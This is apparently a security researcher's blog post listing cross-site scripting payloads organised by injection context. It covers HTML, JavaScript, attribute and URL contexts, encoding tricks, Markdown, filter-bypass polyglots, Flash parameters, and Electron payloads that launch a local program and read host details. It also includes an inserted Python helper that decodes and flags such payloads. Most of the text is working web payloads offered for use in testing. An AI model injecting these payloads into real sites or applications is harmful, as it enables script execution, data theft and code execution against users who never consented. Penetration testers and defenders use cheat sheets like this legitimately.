
Common XSS payloads I use

Common XSS Tricks I use

This post contains a list of the XSS payloads I tend to use most often. They were collected from the internet; the origin of most of them is unknown, but they are often shared on Twitter.

Detection/Probing

I usually use the following payloads for probing/detection:

```html
<iframe/onload=prompt(1)>
<img src=1 onerror=confirm(1)>
<snoopy contenteditable id=x onfocus=prompt()>
```

Context Breaking

HTML Context

```html
<a href="javaScriPt:alert(1)">CLICKHERE</a>
<svg/onload=&#97&#108&#101&#114&#116(1)>
<details/open/ontoggle="alert(1)"/>
```

JavaScript Context

```javascript
);alert(1);//
'-confirm(1)-'
'-confirm`1`-'
');confirm(1);
');confirm(1);//
'-confirm(1)-'
```

Attribute Context

```html
value="" onmouseover="alert('XSS')">
value=#000000r93kponfocus=alert(1)autofocus=r93kp
color-input=%23000000 onmouseover=alert(1)
?q=<body style=overflow:auto;height:1000px onscroll=alert(1337) id=x>#x
onmouseover=confirm(1)
num=' onerror=alert(1) alt='
"" onmouseover=alert(1) ">
 "onload="javascript:alert(1)
 " onload="alert(1)
 "onmouseover="confirm(1)//
```

URL Context

```text
data:text/html;base64,PHNjcmlwdD5hbGVydCgnWmVwaHJGaXNoJyk8L3NjcmlwdD4=
data://text/javascript/alert(1)
/onafterscriptexecute=confirm(1)1='
#onafterscriptexecute=confirm(1)1='
data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
```

Encodings

URI Encoding

```html
<a href="javascript:alert%281%29">xss</a>
<iframe src="javascript:%61%6c%65%72%74%28%31%29"/>
```

HTML Entities

```html
<img src=x onerror=&#x22;&#x61;&#x6C;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;&#x22;>
<a href="javascript:alert&#x28;1&#x29">xss</a>
```
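The defender's counterpart to the two encoding sections above and the URL-context list: an added example, not code from this post, of a normaliser that peels off layered URL and HTML-entity encoding before checking a value for the markers these payloads hide (event-handler attributes, `javascript:` URIs, `data:text/html` URIs). The function names and marker patterns are my own, and it is a triage heuristic for log review or filter testing, not a sanitiser.

```python
import html
import re
from urllib.parse import unquote

# Added detection helper, not from the original post: undo layered URL and
# HTML-entity encoding so that a check is not fooled by payloads such as
# "javascript:alert%281%29" or "onload=&#97&#108&#101&#114&#116(1)".
MAX_ROUNDS = 5  # bound the decode loop so crafted input cannot spin it

# Coarse markers for the HTML, attribute and URL contexts listed above.
EVENT_HANDLER = re.compile(r"""[\s/"']on[a-z]+\s*=""")
JS_SCHEME = re.compile(r"""(?:^|[\s"'=(])javascript\s*:""")
DATA_HTML = re.compile(r"data:\s*text/html")


def normalize(value: str) -> str:
    """Repeatedly URL-decode then entity-decode until the text stops changing."""
    current = value
    for _ in range(MAX_ROUNDS):
        decoded = html.unescape(unquote(current))
        if decoded == current:
            break
        current = decoded
    # Case-fold so that JaVaScRiPt: and OnLoAd= are caught as well.
    return current.lower()


def classify(value: str) -> list[str]:
    """Return the marker names found after normalisation (empty list = none)."""
    text = normalize(value)
    hits = []
    if EVENT_HANDLER.search(text):
        hits.append("event-handler")
    if JS_SCHEME.search(text):
        hits.append("javascript-uri")
    if DATA_HTML.search(text):
        hits.append("data-html-uri")
    return hits


if __name__ == "__main__":
    # Constructed samples: encoded payloads from this post plus a benign value.
    samples = [
        "<svg/onload=&#97&#108&#101&#114&#116(1)>",
        '<a href="javascript:alert%281%29">xss</a>',
        "<img src=x onerror=&#x22;&#x61;&#x6C;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;&#x22;>",
        "q=cheap%20flights",
    ]
    for sample in samples:
        print(f"{classify(sample)!s:20} {normalize(sample)}")
```

The `[\s/"']on[a-z]+=` marker also fires on harmless paths such as `/ontology=`, so treat a hit as something to look at, not as a verdict.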

Markdown XSS Payloads I commonly use

```markdown
[ClickMe](javascript:prompt(window.location.pathname))
[ClickME](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)
![ClickME](https://www.example.com/image.png"onload="alert(1))
```

Other common things I try:

* Case variation: `<Iframe Src="//snoopysecurity" OnlOad="alert(0)"/>`
* Arbitrary tags: `<snoopy onmouseover="alert(1)">Test</snoopy>`
* Insert with no closing tag: `<img src="x" onerror="alert(1)"` (browsers will happily execute this)
* Add forward slashes or whitespace, e.g. `svg onload` or `svg/onload`

Polyglot (Taken from https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot)

```text
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
```

Multi-context, filter bypass based polyglot payload #1 (Rsnake XSS Cheat Sheet)

```text
';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>
```

Multi-context, filter bypass based polyglot payload #2 (Ashar Javed XSS Research)

```text
">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm&lpar; 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg">
```

SWF Parameter XSS

For automation, you can use Flashbang, Flare or HP SWFScan.

* Common parameters: onload, allowedDomain, movieplayer, xmlPath, eventhandler, callback (more on the OWASP page)
* Common injection strings:
  * `+\%22})))}catch(e){alert(document.domain);}//`
  * `"]);}catch(e){}if(!self.a)self.a=!alert(document.domain);//`
  * `"a")(({type:"ready"}));}catch(e){alert(1)}//`

Electron

```html
<iframe src=x onload="require('electron').shell.openExternal('C:/Windows/System32/calc.exe')"></iframe>
"><img src=1 onerror="var os = require('os'); var hostname = os.platform(); var homedir = os.homedir(); alert('Host:' + hostname + 'directory: ' + homedir);">
<onmouseover="alert(1)"> <s onmouseover="var os = require('os'); var hostname = os.platform(); var homedir = os.homedir(); alert('Host:' + hostname + 'directory: ' + homedir);">Hallo</s>
```

The following resources are great reference guides:

* https://portswigger.net/web-security/cross-site-scripting/cheat-sheet
* https://github.com/masatokinugawa/filterbypass
* https://github.com/cure53/H5SC
* https://owasp.org/www-community/xss-filter-evasion-cheatsheet#XSS_Locator
* https://htmledit.squarefree.com/

This post is licensed under CC BY 4.0 by the author.